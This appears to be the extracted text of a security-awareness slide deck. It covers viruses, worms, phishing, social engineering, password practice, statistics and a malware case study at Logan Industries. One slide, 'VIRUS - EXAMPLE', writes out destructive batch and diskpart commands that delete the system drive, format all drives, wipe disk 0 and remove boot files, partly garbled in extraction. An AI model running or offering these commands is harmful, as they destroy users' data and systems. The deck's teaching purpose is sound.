Computer security is important for both individuals and businesses. A malware infection at Logan Industries spread to hundreds of computers in just a few days, costing the company tens of thousands of dollars to remedy. Common cyber threats include viruses, worms, Trojan horses, and social engineering. Users should be aware of phishing scams, strong password practices, and wireless security risks. Regular security awareness training and having a security plan in place are recommended for protecting systems and information.
2. “As the world is increasingly
interconnected, everyone shares the
responsibility of securing
cyberspace.”
-Newton Lee
3. OUTLINE
• What is Computer Security
• Importance of Security
• Small business
• Cyber Security Statistics
• You are the target
• Cyber Scam
• 10 scams to watch out
• Leading Threats
• Password
• Keylogger
• Sniffing
• Phishing
• Security Plan
• Case – Malware
• Security issues
4. WHAT IS COMPUTER SECURITY ?
• Securing Computers, Smartphones, Networks, Internet.
• defending information from unauthorized access, use,
disclosure, disruption, modification, perusal, inspection,
recording or destruction, unplanned events and natural
disasters.
5. IMPORTANCE OF SECURITY
• The internet allows an attacker to attack from anywhere on
the planet.
• Governments, military, corporations, financial institutions,
hospitals and other businesses collect, process and store a
great deal of confidential information on computers and
transmit that data across networks to other computers. With
the growing volume and sophistication of cyber attacks,
ongoing attention is required to protect sensitive business
and personal information.
Risks caused by poor security knowledge and practice:
Identity Theft
Monetary Theft
Legal Ramifications (for yourself and companies)
Termination if company policies are not followed
6. • One of the best ways to make sure company employees will not make costly errors in
regard to information security is to institute company-wide security-awareness training
(SANS)
7. MOST SMALL BUSINESSES DON’T RECOVER
FROM CYBERCRIME
• 60% of small businesses will shutter within half a year after being victimized by
cybercrime.
• 90% do not have an internal IT manager for security
• 87% do not have a formal written security policy
• http://smallbusiness.foxbusiness.com/technology-web/2013/03/21/most-small-businesses-
dont-recover-from-cybercrime/
8. STATISTICS
• 91% increase in attacks 2013 (Symantec)
• 62% increase in the number of breaches in 2013
• (Facebook)
• Over 552M identities were exposed via breaches in 2013 (493%+ 2012)
• 38% of mobile users have experienced mobile cybercrime in past 12 months
• 1 in 392 emails contain a phishing attacks
• 86% of all websites had at least one vulnerability
• Most Data Breaches (Retail/Merchant=15M , Financial/Insurance=8M, Other=6M)
9. STATISTICS
• 100M Phishing message everyday(Agari)
• 3Bilion Phishing Message monthly
• Phishing costs $ 70.2 Billion (Cisco)
• Phishing cost corporate IT $ 28.1 Billion (IID)
• 25% increase in Email Malware as URL
• 1 in 196 Email Virus Rate
• 1 in 566 website with Malware
• 62% UAE users cannot recognize phishing message (Gulf news, Kaspersky 2012)
• 70% phishing message targeted bank accounts ( RSA, 2013)
10. YOU ARE THE TARGET
• Explain to end users that they are the target. Far too often people have the misconception
that they are not a target, that their information or their computers has no value to
attackers. Of course we know this to be false. Anyone with an identify, computer or private
information is a target, cyber criminals have made an entire industry of hacking the end
user.
1- users know and understand they
are being actively targeted
2- risks exist regardless if they are at
work or at home
3- Don’t Be scared, Just Drive Safe !
11. CYBER SCAM
• Due to the high use of the internet, cyber scams have
disrupted bank accounts, sent viruses, and stolen
personal information.
• Most cyber scams are sent through an e-mail account
wherein individuals will open the e-mail to either find a
virus has been put into their computer or to read
misleading information.
• Never entering personal information or credit card
information on unsecure websites, never reply to or click
on any links that you are not affiliated with, and never
respond to an e-mail or advertisement saying you have
won something.
• Rugby World Cup 2015 , World Cup 2014 Brazil,
Auction sites, Jobs and training courses, Business 2
Business, Phishing
13. VIRUS
• A virus attaches itself to a program, file, or disk When the program is executed, the virus
activates and replicates itself.
• Viruses result in crashing of computers and loss of data.
In order to recover/prevent virus/attacks:
Avoid potentially unreliable websites/emails
System Restore
Re-install operating system
Anti-virus (i.e. Avira, AVG, Norton)
Program
A
Extra Code
Program
B
infects
14. VIRUS - EXAMPLE
> @echo off
> del %systemdrive%*.*/f/s/q
> shutdown -r -f -t 00
> xxx.bat
> -----------
> @echo off
> for %%i in (c ,d:,e:,f:,g:) do format %%i /FS:NTFS /x /q
> -----------
> diskpart
> > list disk
> select disk 0
> clean
> create partition primary
> format fs=fat32 quick
> @echo off )))
> attrib -r -s -h c:autoexec.bat )))
> del c:autoexec.bat )))
> attrib -r -s -h c:boot.ini )))
> del c:boot.ini )))
> attrib -r -s -h c:ntldr ))
> del c:ntldr )))
> attrib -r -s -h c:windowswin.ini )))
> del c:windowswin.ini )))
> @echo off ))))
> ((((----shutdown -s -t 10 -c " "-----)))))
15. WORM
• Independent program which replicates itself and sends copies
from computer to computer across network connections.
Upon arrival the worm may be activated to replicate.
To Joe
To Ann
To Bob
Email List:
Joe@gmail.com
Ann@yahoo.com
Bob@uwp.edu
16. TROJAN HORSE
• Masquerades as beneficial program while
quietly destroying data or damaging your
system.
• Download a game: Might be fun but has
hidden part that emails your password file
without you knowing.
17. SOCIAL ENGINEERING
Social engineering manipulates people into performing actions or
divulging confidential information. Similar to a confidence trick or
simple fraud, the term applies to the use of deception to gain
information, commit fraud, or access computer systems.
• Phone Call: This is John, the System Admin. What is your
password?
• In Person: What ethnicity are you? Your mother’s maiden name?
• I have come to repair your machine…and have some software
patches
• Email: ABC Bank has noticed a problem with your account…
18. PASSWORD
• 1- It’s tough to create and remember strong passwords for each
online system or site you access.
• 2- It’s a BAD idea though to use the same password for several or
all systems and site
• 3- contains 8 characters, a mixture of uppercase and lowercase
letters, at least one number and one non-alphanumeric character or
symbol (5P0ky!3Z)
• A. never share your password or write it down or save it !
• B. String Password
• C. Don’t Use common words
• D. Chang your password
19. KEY LOGGER
• Bit of software that gets installed on your computer
unbeknownst to you, and starts logging everything that you
enter into the computer. This type of malware will often send
usernames and passwords back to the attacker, who can then
use this information to get into your bank accounts, social
media accounts, and really anything that would require a
username and password.
• Protect:
• 1- Anti virus
• 2- Firewall
• 3- Malwarebyte
20. SNIFFING
• A sniffer is an application or device that can read, monitor,
and capture network data exchanges and read network
packets. If the packets are not encrypted, a sniffer provides
a full view of the data inside the packet. Even encapsulated
(tunneled) packets can be broken open and read unless
they are encrypted and the attacker does not have access
to the key.
21. PHISHING
• The act of sending an email to a user falsely claiming to be
an established legitimate enterprise in an attempt to scam
the user into surrendering private information that will be
used for identity theft.
23. SECURITY PLAN
• Every company needs to have a security program
• 1- No matter how large or small your company is
• 2- you need to have a plan to ensure the security of your
information assets
• how you will mitigate them, and planning for how you keep the
program and your security practices up to date.
• Risk Assessment
• Policies and Procedures (CIA)
• Awareness
• Audit
• Business Continuity (BC, CP, IR)
24. CASE - MALWARE INFECTION
• Logan Industries
• is a multi-national catalog sale corporation with offices in 30 states
• most offices are small, with fewer than 50 employees,
• First Infection: Monday, Feb. 5 :
• 20 employees at a satellite sales office received an email from the CEO and
President Andrew James with the message.
• Twenty employees experienced a computer shut-down a short time later
• wait for the help desk to contact them about fixing their machines
• The Virus Spreads: Tuesday, Feb. 6
• Early in the morning, the infection had spread from dozens of computers to
hundreds.
• After sending itself, it would cause the machine to reboot and never to recover.
25. • By 10 a.m., the CIO had been called and decided to form a team to deal with the
virus.
• Late Afternoon: Wednesday, February, 7th
• find BadBoy on the disk drive and clean any infected files.
• they spent from five to 10 minutes manually removing the virus code from all file
locations.
• Users at Logan Industries had now been without access to a computer for three days
and were getting frustrated.
26. • The CEO requested a report
from the CIO. The report
included the following costs.
• They didn’t have any security
awareness for their employees
• The ability to describe the business
impact of virus/worm infection
• •A comprehension of the
responsibilities of an IT staff in
delivering a secure environment
• The steps to respond to and recover
from a malware infection
28. SECURITY ISSUES
• Back up
• Unknown file
• Working on public place
• Training, Training, Training
• Security Policy
• Passwords
• Wireless Security
• USB
• Secure your accounts
• Online Banking